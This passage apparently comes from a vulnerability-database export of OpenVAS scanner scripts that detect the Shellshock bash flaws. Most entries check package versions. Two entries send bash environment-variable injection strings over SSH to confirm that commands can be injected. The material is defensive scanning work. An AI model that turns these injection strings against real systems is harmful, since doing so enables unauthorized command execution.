value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-27 15:35:38 +0100 (Tue, 27 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-08 10:10:49 +0530 (Wed, 08 Oct 2014)\");\n script_name(\"GNU Bash Environment Variable Handling Shell RCE Vulnerability (LSC) - 02\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_gnu_bash_detect_lin.nasl\");\n script_mandatory_keys(\"bash/linux/detected\");\n script_exclude_keys(\"ssh/force/pty\");\n\n script_xref(name:\"URL\", value:\"https://ftp.gnu.org/gnu/bash/\");\n script_xref(name:\"URL\", value:\"https://shellshocker.net/\");\n script_xref(name:\"URL\", value:\"http://www.kb.cert.org/vuls/id/252743\");\n script_xref(name:\"URL\", value:\"http://www.openwall.com/lists/oss-security/2014/09/24/32\");\n script_xref(name:\"URL\", value:\"https://community.qualys.com/blogs/securitylabs/2014/09/24/bash-remote-code-execution-vulnerability-cve-2014-6271\");\n\n script_tag(name:\"summary\", value:\"This host is installed with GNU Bash Shell\n and is prone to remote command execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Login to the target machine with ssh\n credentials and check its possible to execute the commands via GNU bash shell.\");\n\n script_tag(name:\"insight\", value:\"GNU bash contains a flaw that is triggered\n when evaluating environment variables passed from another environment.\n After processing a function definition, bash continues to process trailing\n strings. Incomplete fix to CVE-2014-6271\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n or local attackers to inject shell commands, allowing local privilege\n escalation or remote command execution depending on the application vector.\");\n\n script_tag(name:\"affected\", value:\"GNU Bash through 4.3 bash43-025\");\n\n script_tag(name:\"solution\", value:\"Apply the patch from the referenced advisory.\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"ssh_func.inc\");\ninclude(\"host_details.inc\");\n\nif( get_kb_item( \"ssh/force/pty\" ) ) exit( 0 );\n\nif( isnull( port = get_app_port( cpe:CPE, service:\"ssh-login\" ) ) ) exit( 0 );\nif( ! bin = get_app_location( cpe:CPE, port:port ) ) exit( 0 ); # Returns e.g. \"/bin/bash\" or \"unknown\" (if the location of the binary wasn't detected).\n\nsock = ssh_login_or_reuse_connection();\nif( ! sock ) exit( 0 );\n\nif( bin == \"unknown\" )\n bash_cmd = \"bash\";\nelse if( bin =~ \"^/.*bash$\" )\n bash_cmd = bin;\nelse\n exit( 0 ); # Safeguard if something is broken in the bash detection\n\n# echo \"cd /tmp; rm -f /tmp/echo; env X='() { (VT Test)=>\\' /bin/bash -c 'echo id'; cat echo; rm -f /tmp/echo\" | /bin/bash\ncmd = 'echo \"' + \"cd /tmp; rm -f /tmp/echo; env X='() { (VT Test)=>\\' \" + bash_cmd + \" -c 'echo id'; cat echo; rm -f /tmp/echo\" + '\" | ' + bash_cmd;\n\nresult = ssh_cmd( socket:sock, cmd:cmd, nosh:TRUE );\nclose( sock );\n\nif( result =~ \"uid=[0-9]+.*gid=[0-9]+.*\" ) {\n report = \"Used command: \" + cmd + '\\n\\nResult: ' + result;\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:37", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-09-26T00:00:00", "type": "openvas", "title": "RedHat Update for bash RHSA-2014:1306-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2018-11-16T00:00:00", "id": "OPENVAS:1361412562310871250", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871250", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for bash RHSA-2014:1306-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871250\");\n script_version(\"$Revision: 12380 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:03:48 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-09-26 06:07:13 +0200 (Fri, 26 Sep 2014)\");\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Update for bash RHSA-2014:1306-01\");\n script_tag(name:\"insight\", value:\"The GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). Bash is the default\nshell for Red Hat Enterprise Linux.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash still\nallowed certain characters to be injected into other environments via\nspecially crafted environment variables. An attacker could potentially use\nthis flaw to override or bypass environment restrictions to execute shell\ncommands. Certain services and applications allow remote unauthenticated\nattackers to provide environment variables, allowing them to exploit this\nissue. (CVE-2014-7169)\n\nApplications which directly create bash functions as environment variables\nneed to be made aware of changes to the way names are handled by this\nupdate. For more information see the referenced Knowledgebase article.\n\nNote: Docker users are advised to use 'yum update' within their containers,\nand to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer to the\naforementioned Knowledgebase article.\n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\");\n script_tag(name:\"affected\", value:\"bash on Red Hat Enterprise Linux (v. 5 server),\n Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Server (v. 7),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"RHSA\", value:\"2014:1306-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2014-September/msg00053.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_(7|6|5)\");\n\n script_xref(name:\"URL\", value:\"https://access.redhat.com/articles/1200223\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2.45~5.el7_0.4\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bash-debuginfo\", rpm:\"bash-debuginfo~4.2.45~5.el7_0.4\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.1.2~15.el6_5.2\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bash-debuginfo\", rpm:\"bash-debuginfo~4.1.2~15.el6_5.2\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~3.2~33.el5_11.4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bash-debuginfo\", rpm:\"bash-debuginfo~3.2~33.el5_11.4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:26", "description": "Gentoo Linux Local Security Checks GLSA 201409-10", "cvss3": {}, "published": "2015-09-29T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201409-10", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310121273", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121273", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201409-10.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121273\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:27:55 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201409-10\");\n script_tag(name:\"insight\", value:\"Stephane Chazelas reported that Bash incorrectly handles function definitions, allowing attackers to inject arbitrary code (CVE-2014-6271). Gentoo Linux informed about this issue in GLSA 201409-09.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201409-10\");\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201409-10\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"app-shells/bash\", unaffected: make_list(\"ge 3.1_p18-r1\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"app-shells/bash\", unaffected: make_list(\"ge 3.2_p52-r1\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"app-shells/bash\", unaffected: make_list(\"ge 4.0_p39-r1\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"app-shells/bash\", unaffected: make_list(\"ge 4.1_p12-r1\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"app-shells/bash\", unaffected: make_list(\"ge 4.2_p48-r1\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"app-shells/bash\", unaffected: make_list(), vulnerable: make_list(\"lt 4.2_p48-r1\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:38", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "openvas", "title": "Fedora Update for bash FEDORA-2014-11514", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310868211", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868211", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for bash FEDORA-2014-11514\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868211\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 16:58:18 +0530 (Wed, 01 Oct 2014)\");\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Update for bash FEDORA-2014-11514\");\n script_tag(name:\"affected\", value:\"bash on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-11514\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-September/138679.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2.48~2.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:47", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "openvas", "title": "CentOS Update for bash CESA-2014:1306 centos7", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310882032", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882032", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for bash CESA-2014:1306 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882032\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 16:59:55 +0530 (Wed, 01 Oct 2014)\");\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Update for bash CESA-2014:1306 centos7\");\n script_tag(name:\"insight\", value:\"The GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). Bash is the default\nshell for Red Hat Enterprise Linux.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash still\nallowed certain characters to be injected into other environments via\nspecially crafted environment variables. An attacker could potentially use\nthis flaw to override or bypass environment restrictions to execute shell\ncommands. Certain services and applications allow remote unauthenticated\nattackers to provide environment variables, allowing them to exploit this\nissue. (CVE-2014-7169)\n\nApplications which directly create bash functions as environment variables\nneed to be made aware of changes to the way names are handled by this\nupdate. For more information see the Knowledgebase article at the linked references.\n\nNote: Docker users are advised to use 'yum update' within their containers,\nand to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer to the\naforementioned Knowledgebase article.\n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\");\n script_tag(name:\"affected\", value:\"bash on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"CESA\", value:\"2014:1306\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2014-September/020592.html\");\n script_xref(name:\"URL\", value:\"https://access.redhat.com/articles/1200223\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2.45~5.el7_0.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.2.45~5.el7_0.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:34", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "openvas", "title": "Fedora Update for bash FEDORA-2014-11527", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310868208", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868208", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for bash FEDORA-2014-11527\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868208\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 16:59:50 +0530 (Wed, 01 Oct 2014)\");\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Update for bash FEDORA-2014-11527\");\n script_tag(name:\"affected\", value:\"bash on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-11527\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-September/138687.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2.48~2.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:19", "description": "This host is installed with GNU Bash Shell\n and is prone to remote command execution vulnerability.", "cvss3": {}, "published": "2014-10-08T00:00:00", "type": "openvas", "title": "GNU Bash Environment Variable Handling Shell RCE Vulnerability (LSC) - 04", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6277", "CVE-2014-6271"], "modified": "2018-11-27T00:00:00", "id": "OPENVAS:1361412562310802086", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802086", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_bash_shellshock_credential_cmd_exec_vuln_04.nasl 12551 2018-11-27 14:35:38Z cfischer $\n#\n# GNU Bash Environment Variable Handling Shell RCE Vulnerability (LSC) - 04\n#\n# Authors:\n# Veerendra GG <veerendragg@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:gnu:bash\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802086\");\n script_version(\"$Revision: 12551 $\");\n script_cve_id(\"CVE-2014-6277\");\n script_bugtraq_id(70165);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-27 15:35:38 +0100 (Tue, 27 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-08 12:11:49 +0530 (Wed, 08 Oct 2014)\");\n script_name(\"GNU Bash Environment Variable Handling Shell RCE Vulnerability (LSC) - 04\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_gnu_bash_detect_lin.nasl\");\n script_mandatory_keys(\"bash/linux/detected\");\n script_exclude_keys(\"ssh/force/pty\");\n\n script_xref(name:\"URL\", value:\"https://shellshocker.net\");\n script_xref(name:\"URL\", value:\"http://lcamtuf.blogspot.in/2014/09/bash-bug-apply-unofficial-patch-now.html\");\n script_xref(name:\"URL\", value:\"https://ftp.gnu.org/gnu/bash/\");\n\n script_tag(name:\"summary\", value:\"This host is installed with GNU Bash Shell\n and is prone to remote command execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Login to the target machine with ssh\n credentials and check its possible to execute the commands via GNU bash shell.\");\n\n script_tag(name:\"insight\", value:\"GNU bash contains a flaw that is triggered\n when evaluating environment variables passed from another environment.\n After processing a function definition, bash continues to process trailing\n strings. Incomplete fix to CVE-2014-7169, CVE-2014-6271\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n or local attackers to inject shell commands, allowing local privilege\n escalation or remote command execution depending on the application vector.\");\n\n script_tag(name:\"affected\", value:\"GNU Bash through 4.3 bash43-026\");\n\n script_tag(name:\"solution\", value:\"Apply the patch from the referenced advisory.\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"ssh_func.inc\");\ninclude(\"host_details.inc\");\n\nif( get_kb_item( \"ssh/force/pty\" ) ) exit( 0 );\n\nif( isnull( port = get_app_port( cpe:CPE, service:\"ssh-login\" ) ) ) exit( 0 );\nif( ! bin = get_app_location( cpe:CPE, port:port ) ) exit( 0 ); # Returns e.g. \"/bin/bash\" or \"unknown\" (if the location of the binary wasn't detected).\n\nsock = ssh_login_or_reuse_connection();\nif( ! sock ) exit( 0 );\n\nif( bin == \"unknown\" )\n bash_cmd = \"bash\";\nelse if( bin =~ \"^/.*bash$\" )\n bash_cmd = bin;\nelse\n exit( 0 ); # Safeguard if something is broken in the bash detection\n\n# echo \"vt_test='() { x() { _;}; x() { _;} <<a; }' /bin/bash -c date 2>/dev/null || echo CVE-2014-6277 vulnerable\" | /bin/bash\ncmd = 'echo \"' + \"vt_test='() { x() { _;}; x() { _;} <<a; }' \" + bash_cmd + \" -c date 2>/dev/null || echo CVE-2014-6277 vulnerable\" + '\" | ' + bash_cmd;\n\nresult = ssh_cmd( socket:sock, cmd:cmd, nosh:TRUE );\nclose( sock );\n\nif( \"Unsupported use of\" >< result ) exit( 99 );\n\nif( \"CVE-2014-6277 vulnerable\" >< result ) {\n report = \"Used command: \" + cmd + '\\n\\nResult: ' + result;\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-07T16:39:05", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-09-18T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for bash (openSUSE-SU-2014:1254-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "modified": "2020-04-02T00:00:00", "id": "OPENVAS:1361412562310850676", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850676", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective 